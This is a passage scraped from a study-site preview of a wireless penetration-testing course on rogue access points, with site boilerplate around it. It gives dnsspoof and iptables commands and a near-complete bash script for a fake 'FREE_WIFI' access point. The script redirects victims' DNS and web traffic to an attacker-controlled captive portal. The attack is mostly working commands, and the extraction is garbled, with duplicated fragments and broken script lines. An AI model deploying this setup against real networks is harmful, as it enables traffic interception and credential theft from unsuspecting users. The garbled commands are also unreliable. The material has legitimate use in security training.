However it still has a number of weaknesses For one thing wireless devices that

However it still has a number of weaknesses for one

This preview shows page 36 - 38 out of 48 pages.

we want. However, it still has a number of weaknesses. For one thing, wireless devices that connect to our rogue access point may choose to ignore the DHCP Option, selecting a nameserver manually instead. To prevent this from occurring, we can simply redirect any DNS traffic to our DNS server using iptables. Another problem with our current approach is that it does not account for the fact that most operating systems use a DNS cache to avoid having to make DNS lookups repeatedly. The domain names of the victim’s most frequently visited websites are likely to be in this cache. This means that our captive portal will fail in most situations until each of the entries in the cache expire. Additionally, our current approach will fail to capture HTTP requests that do not make use of DNS. To deal with these issues, we can simply redirect all HTTP traffic to our own HTTP server. We can incorporate these techniques into a bash script similar to the one we wrote in Wireless Man-In-The-Middle Attacks . Notice how we start Apache2 to serve content from /var/www/html. [email protected]~# echo ’10.0.0.1’ > dnsspoof.conf [email protected]~# dnsspoof i wlan0 -f ./dnsspoof.conf [email protected]~# iptables --table nat --append PREROUTING --protocol udp - -destination-port 53 --jump REDIRECT --to-port 53 [email protected]~# iptables --table nat --append PREROUTING --protocol tcp - -destination-port 80 --jump REDIRECT --to-port 80 [email protected]~# iptables --table nat --append PREROUTING --protocol tcp - -destination-port 443 --jump REDIRECT --to-port 443
Image of page 36
Advanced Wireless Attacks Against Enterprise Networks Firewall And NAC Evasion Using Indirect Wireless Pivots 37 phy=wlan0 channel=1 bssid=00:11:22:33:44:00 essid=FREE_WIFI # kill interfering processes service network-manager stop nmcli radio wifi off rfkill unblock wlan ifconfig wlan0 up echo “interface=$phy” > hostapd.conf “driver=nl80211” >> hostapd.conf “ssid=$essid” >> hostapd.conf bssid=$bssid” >> hostapd.conf “channel=$channel” >> hostapd.conf “hw_mode=g” >> hostapd.conf hostapd ./hostapd ifconfig $phy 10.0.0.1 netmask 255.255.255.0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 echo "# define DHCP pool" > dnsmasq.conf echo "dhcp-range=10.0.0.80,10.0.0.254,6h" >> dnsmasq.conf echo "" >> dnsmasq.conf echo "# set phy as nameserver" >> dnsmasq.conf echo "dhcp-option=6,10.0.0.1" >> dnsmasq.conf echo "" >> dnsmasq.conf echo "# set rogue AP as Gateway" >> dnsmasq.conf echo "dhcp-option=3,10.0.0.1 #Gateway" >> dnsmasq.conf echo "" >> dnsmasq.conf echo "dhcp-authoritative" >> dnsmasq.conf echo "log-queries" >> dnsmasq.conf dnsmasq -C ./dnsmasq.conf & echo ’10.0.0.1’ > dnsspoof.conf dnsspoof i $phy -f ./dnsspoof.conf systemctl start apache2 echo ‘1’ > /proc/sys/net/ipv4/ip_forward iptables --policy INPUT ACCEPT iptables --policy FORWARD ACCEPT iptables --policy OUTPUT ACCEPT iptables --flush iptables --table nat --flush iptables --table nat --append POSTROUTING -o $upstream --jump MASQUERADE iptables --append FORWARD -i $phy -o $upstream --jump ACCEPT iptables --table nat --append PREROUTING --protocol udp --destination-port 53 --jump REDIRECT --to-port 53 iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 80 iptables --table nat --append PREROUTING --protocol tcp --destination-port
Image of page 37
Image of page 38

You've reached the end of your free preview.

Want to read all 48 pages?

  • Fall '18
  • fasdfasdfasd
  • Wi-Fi, Wireless access point, Gabriel Ryan

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture

Stuck? We have tutors online 24/7 who can help you get unstuck.
A+ icon
Ask Expert Tutors You can ask You can ask You can ask (will expire )
Answers in as fast as 15 minutes